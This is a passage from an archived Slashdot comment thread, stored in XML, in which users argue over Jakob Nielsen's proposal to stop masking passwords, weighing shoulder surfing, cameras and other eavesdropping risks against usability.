	<htmltext><blockquote><div><p> <i>Shoulder surfing.</i></p></div> </blockquote><p>Might I suggest you RTFA?</p><blockquote><div><p>Most websites (and many other applications) mask passwords as users type them, and thereby theoretically prevent miscreants from looking over users' shoulders. Of course, a truly skilled criminal can simply look at the keyboard and note which keys are being pressed. So, password masking doesn't even protect fully against snoopers.

</p><p>More importantly, there's usually nobody looking over your shoulder when you log in to a website. It's just you, sitting all alone in your office, suffering reduced usability to protect against a non-issue.</p></div>
</blockquote></div>
	</htmltext>
<tokenext>Shoulder surfing .
Might I suggest you RTFA ? Most websites ( and many other applications ) mask passwords as users type them , and thereby theoretically prevent miscreants from looking over users ' shoulders .
Of course , a truly skilled criminal can simply look at the keyboard and note which keys are being pressed .
So , password masking does n't even protect fully against snoopers .
More importantly , there 's usually nobody looking over your shoulder when you log in to a website .
It 's just you , sitting all alone in your office , suffering reduced usability to protect against a non-issue .</tokentext>
<sentencetext> Shoulder surfing.
Might I suggest you RTFA?Most websites (and many other applications) mask passwords as users type them, and thereby theoretically prevent miscreants from looking over users' shoulders.
Of course, a truly skilled criminal can simply look at the keyboard and note which keys are being pressed.
So, password masking doesn't even protect fully against snoopers.
More importantly, there's usually nobody looking over your shoulder when you log in to a website.
It's just you, sitting all alone in your office, suffering reduced usability to protect against a non-issue.

	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470865</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478211</id>
	<title>Try this on Firefox</title>
	<author>jawahar</author>
	<datestamp>1245958140000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Go to <a href="http://slashdot.org/" title="slashdot.org" rel="nofollow">http://slashdot.org/</a> [slashdot.org]
<ol>
<li>Right click</li><li>View Page Info</li><li>Click on Security Tab</li><li>Click on View Saved Passwords</li></ol></htmltext>
<tokenext>Go to http : //slashdot.org/ [ slashdot.org ] Right clickView Page InfoClick on Security TabClick on View Saved Passwords</tokentext>
<sentencetext>Go to http://slashdot.org/ [slashdot.org]

Right clickView Page InfoClick on Security TabClick on View Saved Passwords</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</id>
	<title>Re:hunter2</title>
	<author>mcgrew</author>
	<datestamp>1245921060000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>2</modscore>
	<htmltext><p><i>Well, I'm glad they found such an unbiased and informed person to make such a statement about security versus usability</i></p><p>He's not a security expert, but he IS a useability expert (even though I, a non-expert, often disagree with some of the things he writes). On the whole, though web developers would do well to read his columns.</p><p><i>Perhaps you should read up on our friend Kevin Mitnick and NASA "Hacker" Gary McKinnon both of whom are no strangers to the over-the-shoulder-attack.</i></p><p>That will work even WITH masked passwords, which I found out when a woman watched me use my debit card. Lot of good it did me for the numbers to not be displayed when she simply had to look at what keys I was pressing. In the case of ATMs, masking it "security theater". Lesson 1: don't use a debit card to get money for more booze. Lesson 2: just don't use debit cards!</p><p>However, Nielson adds</p><blockquote><div><p>Yes, users are sometimes truly at risk of having bystanders spy on their passwords, such as when they're using an Internet cafe. It's therefore worth offering them a checkbox to have their passwords masked; for high-risk applications, such as bank accounts, you might even check this box by default. In cases where there's a tension between security and usability, sometimes security should win.</p></div></blockquote><p>Sounds like a good idea to me. Why do I need password masking alone in my own living room? Logging on to my work computer, yes, especially in a cube setting. But not on most internet sites.</p><p>I have to applaud what he says about reset buttons on forms, especially long ones. They have no use whatever except to make you retype everything if you hit the stupid thing by mistake.</p><p><i>I think sacrificing a few login attempts worth of time is worth the security.</i></p><p>Good security involves locking out the user after a certain number of attempts in order to stop a "dictionary attack". I just had to reset a users PW twice this afternoon because she locked herself out of her account. Sure, it's extra hassle but the security is worth it.</p><p><i>[citation desperately needed]</i></p><p>If Stephen Hawking says something about physics, do you require a citation from him? Nielson is recognized as one of the leading experts in his field.</p></div>
	</htmltext>
<tokenext>Well , I 'm glad they found such an unbiased and informed person to make such a statement about security versus usabilityHe 's not a security expert , but he IS a useability expert ( even though I , a non-expert , often disagree with some of the things he writes ) .
On the whole , though web developers would do well to read his columns.Perhaps you should read up on our friend Kevin Mitnick and NASA " Hacker " Gary McKinnon both of whom are no strangers to the over-the-shoulder-attack.That will work even WITH masked passwords , which I found out when a woman watched me use my debit card .
Lot of good it did me for the numbers to not be displayed when she simply had to look at what keys I was pressing .
In the case of ATMs , masking it " security theater " .
Lesson 1 : do n't use a debit card to get money for more booze .
Lesson 2 : just do n't use debit cards ! However , Nielson addsYes , users are sometimes truly at risk of having bystanders spy on their passwords , such as when they 're using an Internet cafe .
It 's therefore worth offering them a checkbox to have their passwords masked ; for high-risk applications , such as bank accounts , you might even check this box by default .
In cases where there 's a tension between security and usability , sometimes security should win.Sounds like a good idea to me .
Why do I need password masking alone in my own living room ?
Logging on to my work computer , yes , especially in a cube setting .
But not on most internet sites.I have to applaud what he says about reset buttons on forms , especially long ones .
They have no use whatever except to make you retype everything if you hit the stupid thing by mistake.I think sacrificing a few login attempts worth of time is worth the security.Good security involves locking out the user after a certain number of attempts in order to stop a " dictionary attack " .
I just had to reset a users PW twice this afternoon because she locked herself out of her account .
Sure , it 's extra hassle but the security is worth it .
[ citation desperately needed ] If Stephen Hawking says something about physics , do you require a citation from him ?
Nielson is recognized as one of the leading experts in his field .</tokentext>
<sentencetext>Well, I'm glad they found such an unbiased and informed person to make such a statement about security versus usabilityHe's not a security expert, but he IS a useability expert (even though I, a non-expert, often disagree with some of the things he writes).
On the whole, though web developers would do well to read his columns.Perhaps you should read up on our friend Kevin Mitnick and NASA "Hacker" Gary McKinnon both of whom are no strangers to the over-the-shoulder-attack.That will work even WITH masked passwords, which I found out when a woman watched me use my debit card.
Lot of good it did me for the numbers to not be displayed when she simply had to look at what keys I was pressing.
In the case of ATMs, masking it "security theater".
Lesson 1: don't use a debit card to get money for more booze.
Lesson 2: just don't use debit cards!However, Nielson addsYes, users are sometimes truly at risk of having bystanders spy on their passwords, such as when they're using an Internet cafe.
It's therefore worth offering them a checkbox to have their passwords masked; for high-risk applications, such as bank accounts, you might even check this box by default.
In cases where there's a tension between security and usability, sometimes security should win.Sounds like a good idea to me.
Why do I need password masking alone in my own living room?
Logging on to my work computer, yes, especially in a cube setting.
But not on most internet sites.I have to applaud what he says about reset buttons on forms, especially long ones.
They have no use whatever except to make you retype everything if you hit the stupid thing by mistake.I think sacrificing a few login attempts worth of time is worth the security.Good security involves locking out the user after a certain number of attempts in order to stop a "dictionary attack".
I just had to reset a users PW twice this afternoon because she locked herself out of her account.
Sure, it's extra hassle but the security is worth it.
[citation desperately needed]If Stephen Hawking says something about physics, do you require a citation from him?
Nielson is recognized as one of the leading experts in his field.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470839</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471173</id>
	<title>Two more words for Nielsen: Security Cameras</title>
	<author>hoosbane</author>
	<datestamp>1245920700000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext>Just because you don't think someone is watching over your shoulder, doesn't mean someone isn't watching over your shoulder.</htmltext>
<tokenext>Just because you do n't think someone is watching over your shoulder , does n't mean someone is n't watching over your shoulder .</tokentext>
<sentencetext>Just because you don't think someone is watching over your shoulder, doesn't mean someone isn't watching over your shoulder.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473397</id>
	<title>Re:People are a problem</title>
	<author>taustin</author>
	<datestamp>1245928560000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I had a web site selling PDF books for a while, too, quite some time ago. I ended up with the password box on the download page not masking the password either, because an early version of Internet Explorer had a tendency to drop the last letter when you did a copy &amp; paste (or maybe Outlook Express dropped it on copy). Never had a complaint about it, because I explained it in the email with the download instructions.</p><p>Sure, it is technically more secure to mask the passwords, but in the case of a $5 PDF file that isn't being pirated anyway, it simply doesn't matter. Security that gets in the way of what you're trying to do will, inevitably, either be bypassed, or keep you from doing what you're trying to do. That's not security, that's a bug.</p></htmltext>
<tokenext>I had a web site selling PDF books for a while , too , quite some time ago .
I ended up with the password box on the download page not masking the password either , because an early version of Internet Explorer had a tendency to drop the last letter when you did a copy &amp; paste ( or maybe Outlook Express dropped it on copy ) .
Never had a complaint about it , because I explained it in the email with the download instructions.Sure , it is technically more secure to mask the passwords , but in the case of a $ 5 PDF file that is n't being pirated anyway , it simply does n't matter .
Security that gets in the way of what you 're trying to do will , inevitably , either be bypassed , or keep you from doing what you 're trying to do .
That 's not security , that 's a bug .</tokentext>
<sentencetext>I had a web site selling PDF books for a while, too, quite some time ago.
I ended up with the password box on the download page not masking the password either, because an early version of Internet Explorer had a tendency to drop the last letter when you did a copy &amp; paste (or maybe Outlook Express dropped it on copy).
Never had a complaint about it, because I explained it in the email with the download instructions.Sure, it is technically more secure to mask the passwords, but in the case of a $5 PDF file that isn't being pirated anyway, it simply doesn't matter.
Security that gets in the way of what you're trying to do will, inevitably, either be bypassed, or keep you from doing what you're trying to do.
That's not security, that's a bug.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471351</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473463</id>
	<title>Re:Security</title>
	<author>bwcbwc</author>
	<datestamp>1245928800000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>Masking passwords, logging off the user on non-use after ten minutes, and other such security methods do not actually decrease the chance of compromise significantly when the user has physical security. Websites should allow for this.</p></div><p>You mean you'd trust the average user to make a security decision about whether a website should show them their password in cleartext? The only users who could be trusted with that authority are the ones who are security-conscious enough to recognize the value of having the password masked or completely hidden, and therefore have no need to turn it off, even when they're in a situation where such masking isn't required.</p><p>Remember, these are the same users that fill their PCs up with so much crap and malware that the guys at Geek Squad are still in business.</p></div>
	</htmltext>
<tokenext>Masking passwords , logging off the user on non-use after ten minutes , and other such security methods do not actually decrease the chance of compromise significantly when the user has physical security .
Websites should allow for this.You mean you 'd trust the average user to make a security decision about whether a website should show them their password in cleartext ?
The only users who could be trusted with that authority are the ones who are security-conscious enough to recognize the value of having the password masked or completely hidden , and therefore have no need to turn it off , even when they 're in a situation where such masking is n't required.Remember , these are the same users that fill their PCs up with so much crap and malware that the guys at Geek Squad are still in business .</tokentext>
<sentencetext>Masking passwords, logging off the user on non-use after ten minutes, and other such security methods do not actually decrease the chance of compromise significantly when the user has physical security.
Websites should allow for this.You mean you'd trust the average user to make a security decision about whether a website should show them their password in cleartext?
The only users who could be trusted with that authority are the ones who are security-conscious enough to recognize the value of having the password masked or completely hidden, and therefore have no need to turn it off, even when they're in a situation where such masking isn't required.Remember, these are the same users that fill their PCs up with so much crap and malware that the guys at Geek Squad are still in business.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471093</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470931</id>
	<title>legal reasons</title>
	<author>Anonymous</author>
	<datestamp>1245963120000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>My guess is that everyone's already figured out what Nielson has suggested, but they don't want to change it for legal reasons.  You don't want an expert witness testifying in court that a password may have been stolen through eavesdropping.</p><p>Otherwise, yeah... first two attempts should be masked, subsequent attempts cleartext by default with a checkoff option to mask.  ATM and debit card readers, always masked, no option.</p></htmltext>
<tokenext>My guess is that everyone 's already figured out what Nielson has suggested , but they do n't want to change it for legal reasons .
You do n't want an expert witness testifying in court that a password may have been stolen through eavesdropping.Otherwise , yeah... first two attempts should be masked , subsequent attempts cleartext by default with a checkoff option to mask .
ATM and debit card readers , always masked , no option .</tokentext>
<sentencetext>My guess is that everyone's already figured out what Nielson has suggested, but they don't want to change it for legal reasons.
You don't want an expert witness testifying in court that a password may have been stolen through eavesdropping.Otherwise, yeah... first two attempts should be masked, subsequent attempts cleartext by default with a checkoff option to mask.
ATM and debit card readers, always masked, no option.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471541</id>
	<title>Re:Two words</title>
	<author>radtea</author>
	<datestamp>1245921840000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>5</modscore>
	<htmltext><p><i>Retarded doesn't begin to cover this. </i></p><p>The best thing about the article, typical of an unfortunately large amount of usability literature, is the complete absence of empirical data.  He simply asserts, for example, "users will not be confused by this" without offering a shred of empirical evidence for the claim.  I'm not a typical user, but I'd sure as hell be confused if plaintext started to appear in the UI where a decade or two of experience has taught me to expect a line of bullets.  I sure as hell wouldn't want to be on a helpdesk for a system that has just made this change.</p><p>Usability is an important area of software design, but it is still in its infancy, and the lack of usability experts chiming in to call this guy a blithering idiot is depressing.  All claims about usability of any feature should be considered nonsense until someone comes to you with empirical data from real users that tell you what they find usable.  Otherwise you're arguing mythological hypotheticals--how many users can dance on a pinhead.</p></htmltext>
<tokenext>Retarded does n't begin to cover this .
The best thing about the article , typical of an unfortunately large amount of usability literature , is the complete absence of empirical data .
He simply asserts , for example , " users will not be confused by this " without offering a shred of empirical evidence for the claim .
I 'm not a typical user , but I 'd sure as hell be confused if plaintext started to appear in the UI where a decade or two of experience has taught me to expect a line of bullets .
I sure as hell would n't want to be on a helpdesk for a system that has just made this change.Usability is an important area of software design , but it is still in its infancy , and the lack of usability experts chiming in to call this guy a blithering idiot is depressing .
All claims about usability of any feature should be considered nonsense until someone comes to you with empirical data from real users that tell you what they find usable .
Otherwise you 're arguing mythological hypotheticals--how many users can dance on a pinhead .</tokentext>
<sentencetext>Retarded doesn't begin to cover this.
The best thing about the article, typical of an unfortunately large amount of usability literature, is the complete absence of empirical data.
He simply asserts, for example, "users will not be confused by this" without offering a shred of empirical evidence for the claim.
I'm not a typical user, but I'd sure as hell be confused if plaintext started to appear in the UI where a decade or two of experience has taught me to expect a line of bullets.
I sure as hell wouldn't want to be on a helpdesk for a system that has just made this change.Usability is an important area of software design, but it is still in its infancy, and the lack of usability experts chiming in to call this guy a blithering idiot is depressing.
All claims about usability of any feature should be considered nonsense until someone comes to you with empirical data from real users that tell you what they find usable.
Otherwise you're arguing mythological hypotheticals--how many users can dance on a pinhead.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471039</id>
	<title>Yeah, you really do</title>
	<author>nixdroid</author>
	<datestamp>1245963540000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext>In crowded areas like a call center (and some NOCs) it is necessary to obfuscate passwords.  At home or a private office, maybe not.

Perhaps letting the admin or user decide is practical.  Although the suggestion would no doubt start a major, and hostile, conflagration.</htmltext>
<tokenext>In crowded areas like a call center ( and some NOCs ) it is necessary to obfuscate passwords .
At home or a private office , maybe not .
Perhaps letting the admin or user decide is practical .
Although the suggestion would no doubt start a major , and hostile , conflagration .</tokentext>
<sentencetext>In crowded areas like a call center (and some NOCs) it is necessary to obfuscate passwords.
At home or a private office, maybe not.
Perhaps letting the admin or user decide is practical.
Although the suggestion would no doubt start a major, and hostile, conflagration.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28483131</id>
	<title>Environment ?</title>
	<author>Anonymous</author>
	<datestamp>1246033080000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>It all depends on the environment in which you are conducting your business.  In an unclassified typical office where every worker has his/her own cube - no - there's no reason to mask the password.  In a classified office or an office space that involves workers sharing the same work space - yes - password masking is an absolute necessity.  It just comes down to how much value you place on the sensitivity of the information on any given user's box.  If it wouldn't be terrible should someone unauthorized gain access - then sure, broadcast your passwords to the world... otherwise (and I believe this is much more often the case), mask them.</p></htmltext>
<tokenext>It all depends on the environment in which you are conducting your business .
In an unclassified typical office where every worker has his/her own cube - no - there 's no reason to mask the password .
In a classified office or an office space that involves workers sharing the same work space - yes - password masking is an absolute necessity .
It just comes down to how much value you place on the sensitivity of the information on any given user 's box .
If it would n't be terrible should someone unauthorized gain access - then sure , broadcast your passwords to the world... otherwise ( and I believe this is much more often the case ) , mask them .</tokentext>
<sentencetext>It all depends on the environment in which you are conducting your business.
In an unclassified typical office where every worker has his/her own cube - no - there's no reason to mask the password.
In a classified office or an office space that involves workers sharing the same work space - yes - password masking is an absolute necessity.
It just comes down to how much value you place on the sensitivity of the information on any given user's box.
If it wouldn't be terrible should someone unauthorized gain access - then sure, broadcast your passwords to the world... otherwise (and I believe this is much more often the case), mask them.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474757</id>
	<title>How soon we forget</title>
	<author>kylemonger</author>
	<datestamp>1245933900000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Surely I'm not the only one who remembers Van Eck phreaking... ?  That's why you don't ever want your password displayed on the screen.

<a href="http://en.wikipedia.org/wiki/Van\_Eck" title="wikipedia.org" rel="nofollow">http://en.wikipedia.org/wiki/Van\_Eck</a> [wikipedia.org]</htmltext>
<tokenext>Surely I 'm not the only one who remembers Van Eck phreaking... ? That 's why you do n't ever want your password displayed on the screen .
http : //en.wikipedia.org/wiki/Van \ _Eck [ wikipedia.org ]</tokentext>
<sentencetext>Surely I'm not the only one who remembers Van Eck phreaking... ?  That's why you don't ever want your password displayed on the screen.
http://en.wikipedia.org/wiki/Van\_Eck [wikipedia.org]</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472535</id>
	<title>Re:hunter2</title>
	<author>Trecares</author>
	<datestamp>1245925020000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>3</modscore>
	<htmltext><p>Stephen Hawking would generally be expected to have something to back up his statements. People don't just come up with stuff out of thin air. They do research, experiment, formulate hypotheses and test them. That becomes the body of evidence on which Hawking would base his statements. What kind of evidence does Nielsen have to back his remarks? Polls? Focus groups?</p><p>Nielsen is essentially recommending that usability should trump security which is not necessarily the right answer. Now if he wants to recommend redesigning the authenication system, then I suggest that he collaborate with security experts and come up with a new authenication method then that is both user friendly, and secure.</p><p>I wonder if Nielsen's research considered instances where people forgot or entered the incorrect password. Cases in which, seeing the password in cleartext would not help. The easy answer is to look at the keyboard and see what you're pressing if you cant tell what you're pressing.</p></htmltext>
<tokenext>Stephen Hawking would generally be expected to have something to back up his statements .
People do n't just come up with stuff out of thin air .
They do research , experiment , formulate hypotheses and test them .
That becomes the body of evidence on which Hawking would base his statements .
What kind of evidence does Nielsen have to back his remarks ?
Polls ? Focus groups ? Nielsen is essentially recommending that usability should trump security which is not necessarily the right answer .
Now if he wants to recommend redesigning the authenication system , then I suggest that he collaborate with security experts and come up with a new authenication method then that is both user friendly , and secure.I wonder if Nielsen 's research considered instances where people forgot or entered the incorrect password .
Cases in which , seeing the password in cleartext would not help .
The easy answer is to look at the keyboard and see what you 're pressing if you cant tell what you 're pressing .</tokentext>
<sentencetext>Stephen Hawking would generally be expected to have something to back up his statements.
People don't just come up with stuff out of thin air.
They do research, experiment, formulate hypotheses and test them.
That becomes the body of evidence on which Hawking would base his statements.
What kind of evidence does Nielsen have to back his remarks?
Polls? Focus groups?Nielsen is essentially recommending that usability should trump security which is not necessarily the right answer.
Now if he wants to recommend redesigning the authenication system, then I suggest that he collaborate with security experts and come up with a new authenication method then that is both user friendly, and secure.I wonder if Nielsen's research considered instances where people forgot or entered the incorrect password.
Cases in which, seeing the password in cleartext would not help.
The easy answer is to look at the keyboard and see what you're pressing if you cant tell what you're pressing.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28474987</id>
	<title>Does it really cost business?</title>
	<author>caywen</author>
	<datestamp>1245934800000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>How does he support the claim that it costs businesses money to mask passwords? If your banking site didn't mask your password, would you use it? I wouldn't. Not in this age of high resolution zoom camcorders being able to take 18 hours of straight video.</p></htmltext>
<tokenext>How does he support the claim that it costs businesses money to mask passwords ?
If your banking site did n't mask your password , would you use it ?
I would n't .
Not in this age of high resolution zoom camcorders being able to take 18 hours of straight video .</tokentext>
<sentencetext>How does he support the claim that it costs businesses money to mask passwords?
If your banking site didn't mask your password, would you use it?
I wouldn't.
Not in this age of high resolution zoom camcorders being able to take 18 hours of straight video.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471911</id>
	<title>Meh</title>
	<author>CougMerrik</author>
	<datestamp>1245923040000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Passwords and security experts are the last things making the Internet frustrating and difficult to use for a lot of people.  Both are a waste of everyone's valuable time and someone could make a lot of money by finding a reliable way to get rid of them.  Having to have 27 different passwords to get to one's email means that people frequently have to ask the support people to reset passwords, unlock accounts, etc. because they can't remember how many X's they added on to the end of their 14 letter password that doesn't contain any dictionary words this month.</htmltext>
<tokenext>Passwords and security experts are the last things making the Internet frustrating and difficult to use for a lot of people .
Both are a waste of everyone 's valuable time and someone could make a lot of money by finding a reliable way to get rid of them .
Having to have 27 different passwords to get to one 's email means that people frequently have to ask the support people to reset passwords , unlock accounts , etc .
because they ca n't remember how many X 's they added on to the end of their 14 letter password that does n't contain any dictionary words this month .</tokentext>
<sentencetext>Passwords and security experts are the last things making the Internet frustrating and difficult to use for a lot of people.
Both are a waste of everyone's valuable time and someone could make a lot of money by finding a reliable way to get rid of them.
Having to have 27 different passwords to get to one's email means that people frequently have to ask the support people to reset passwords, unlock accounts, etc.
because they can't remember how many X's they added on to the end of their 14 letter password that doesn't contain any dictionary words this month.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472293</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>BitZtream</author>
	<datestamp>1245924180000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><blockquote><div><p>If they can see your ***ed password on the screen, than they can see your fingers type they characters of your password on the keyboard (again with 1\% exceptions like keyboard covers and remote displays).</p></div></blockquote><p>Or leaning over the keyboard ever so slightly so that if they can see what you are doing its extremely obvious.  You do this at that ATM don't you?  I certainly do.</p><blockquote><div><p>If a malicious person can see your screen, than they are probably close enough that that can tap your cables, install hardware keyloggers, sniff your EMF,</p></div> </blockquote><p>Right, because I can buy the stuff to do that at BestBuy or Walmart.  If you are competing against that sort of level hacker then you aren't just using a password anyway, nice of you to try and compare my laptop to that of the guys at some super secret goverment lab, thats just unrealistic and accounts for very few of the actual breakins that happen.  I highly doubt you are ever even aware of these events due to the security involved with the stuff you would put this sort of effort into.</p><blockquote><div><p>cold boot your RAM and grep it,</p></div></blockquote><p>For reference, you have to do these extremely quickly, so the contents are not lost waiting on a refresh that never comes.  While this attack is possible, they would have to basically rip the computer out of your hands to tear it apart and put the RAM into something useful to read it.  Of course most security aware apps tend to overwrite the memory used to store passwords as soon as possible to be safe so the attack is of little practical value to anyone, unless you consider spending a shitload of time to make it work, so that you can steal someones twitter passwords, since as I said any app that is concerned about security will blank the password pretty quickly.</p><blockquote><div><p>do audio analysis of your typing and decipher your keystrokes, and etc.</p></div></blockquote><p>Okay James Bond Jr, we realize there are ways around it, but you are being entirely impractical and acting like the common criminal has access to all these things and knowledge to do so.  They don't.  Yes there are people that can do these things, but they aren't attempting to do them to the 6 billion or so people on the planet, they are using these sort of things to spy on a hand ful of people that you and I will never know or hear about so from a practical perspective to the general public all the shit you just brought up doesn't exist.</p><p>I'd like to see you get my password based on a login prompt, you can stand over my shoulder and you won't see it.  So okay, the common person won't hunch over when typing passwords, they do tend to notice the douchebag standing over them looking intently at what they are typing.  You may catch a few people who are just oblivious, but its harder than standing on the other side of the room or looking at the monitor with a telescope from across the street through a window and just READING the password.</p><p>In reality, password masks ARE bad, they give away the length of the password.  They are a compromise between proper security, which is no feedback at all, and ease of you for the user to notice if they've typed too many or too few characters.</p><p>The reality of it is that users already know their passwords, they don't NEED TO SEE THEM, the masking provides them a sort of confirmation that their password is possibly right, or certainly wrong.</p><p>You do realize that the monitoring equipment your speaking of wouldn't really need to be 'searched for', if the guy is 'holding' any of the equipment you're referring to, he's going to stand out like a sore thumb.  No need to search him, you can just ask him why he's carrying it.</p></div>
	</htmltext>
<tokenext>If they can see your * * * ed password on the screen , than they can see your fingers type they characters of your password on the keyboard ( again with 1 \ % exceptions like keyboard covers and remote displays ) .Or leaning over the keyboard ever so slightly so that if they can see what you are doing its extremely obvious .
You do this at that ATM do n't you ?
I certainly do.If a malicious person can see your screen , than they are probably close enough that that can tap your cables , install hardware keyloggers , sniff your EMF , Right , because I can buy the stuff to do that at BestBuy or Walmart .
If you are competing against that sort of level hacker then you are n't just using a password anyway , nice of you to try and compare my laptop to that of the guys at some super secret goverment lab , thats just unrealistic and accounts for very few of the actual breakins that happen .
I highly doubt you are ever even aware of these events due to the security involved with the stuff you would put this sort of effort into.cold boot your RAM and grep it,For reference , you have to do these extremely quickly , so the contents are not lost waiting on a refresh that never comes .
While this attack is possible , they would have to basically rip the computer out of your hands to tear it apart and put the RAM into something useful to read it .
Of course most security aware apps tend to overwrite the memory used to store passwords as soon as possible to be safe so the attack is of little practical value to anyone , unless you consider spending a shitload of time to make it work , so that you can steal someones twitter passwords , since as I said any app that is concerned about security will blank the password pretty quickly.do audio analysis of your typing and decipher your keystrokes , and etc.Okay James Bond Jr , we realize there are ways around it , but you are being entirely impractical and acting like the common criminal has access to all these things and knowledge to do so .
They do n't .
Yes there are people that can do these things , but they are n't attempting to do them to the 6 billion or so people on the planet , they are using these sort of things to spy on a hand ful of people that you and I will never know or hear about so from a practical perspective to the general public all the shit you just brought up does n't exist.I 'd like to see you get my password based on a login prompt , you can stand over my shoulder and you wo n't see it .
So okay , the common person wo n't hunch over when typing passwords , they do tend to notice the douchebag standing over them looking intently at what they are typing .
You may catch a few people who are just oblivious , but its harder than standing on the other side of the room or looking at the monitor with a telescope from across the street through a window and just READING the password.In reality , password masks ARE bad , they give away the length of the password .
They are a compromise between proper security , which is no feedback at all , and ease of you for the user to notice if they 've typed too many or too few characters.The reality of it is that users already know their passwords , they do n't NEED TO SEE THEM , the masking provides them a sort of confirmation that their password is possibly right , or certainly wrong.You do realize that the monitoring equipment your speaking of would n't really need to be 'searched for ' , if the guy is 'holding ' any of the equipment you 're referring to , he 's going to stand out like a sore thumb .
No need to search him , you can just ask him why he 's carrying it .</tokentext>
<sentencetext>If they can see your ***ed password on the screen, than they can see your fingers type they characters of your password on the keyboard (again with 1\% exceptions like keyboard covers and remote displays).Or leaning over the keyboard ever so slightly so that if they can see what you are doing its extremely obvious.
You do this at that ATM don't you?
I certainly do.If a malicious person can see your screen, than they are probably close enough that that can tap your cables, install hardware keyloggers, sniff your EMF, Right, because I can buy the stuff to do that at BestBuy or Walmart.
If you are competing against that sort of level hacker then you aren't just using a password anyway, nice of you to try and compare my laptop to that of the guys at some super secret goverment lab, thats just unrealistic and accounts for very few of the actual breakins that happen.
I highly doubt you are ever even aware of these events due to the security involved with the stuff you would put this sort of effort into.cold boot your RAM and grep it,For reference, you have to do these extremely quickly, so the contents are not lost waiting on a refresh that never comes.
While this attack is possible, they would have to basically rip the computer out of your hands to tear it apart and put the RAM into something useful to read it.
Of course most security aware apps tend to overwrite the memory used to store passwords as soon as possible to be safe so the attack is of little practical value to anyone, unless you consider spending a shitload of time to make it work, so that you can steal someones twitter passwords, since as I said any app that is concerned about security will blank the password pretty quickly.do audio analysis of your typing and decipher your keystrokes, and etc.Okay James Bond Jr, we realize there are ways around it, but you are being entirely impractical and acting like the common criminal has access to all these things and knowledge to do so.
They don't.
Yes there are people that can do these things, but they aren't attempting to do them to the 6 billion or so people on the planet, they are using these sort of things to spy on a hand ful of people that you and I will never know or hear about so from a practical perspective to the general public all the shit you just brought up doesn't exist.I'd like to see you get my password based on a login prompt, you can stand over my shoulder and you won't see it.
So okay, the common person won't hunch over when typing passwords, they do tend to notice the douchebag standing over them looking intently at what they are typing.
You may catch a few people who are just oblivious, but its harder than standing on the other side of the room or looking at the monitor with a telescope from across the street through a window and just READING the password.In reality, password masks ARE bad, they give away the length of the password.
They are a compromise between proper security, which is no feedback at all, and ease of you for the user to notice if they've typed too many or too few characters.The reality of it is that users already know their passwords, they don't NEED TO SEE THEM, the masking provides them a sort of confirmation that their password is possibly right, or certainly wrong.You do realize that the monitoring equipment your speaking of wouldn't really need to be 'searched for', if the guy is 'holding' any of the equipment you're referring to, he's going to stand out like a sore thumb.
No need to search him, you can just ask him why he's carrying it.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477787</id>
	<title>Re:Two words</title>
	<author>ewanm89</author>
	<datestamp>1245954240000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
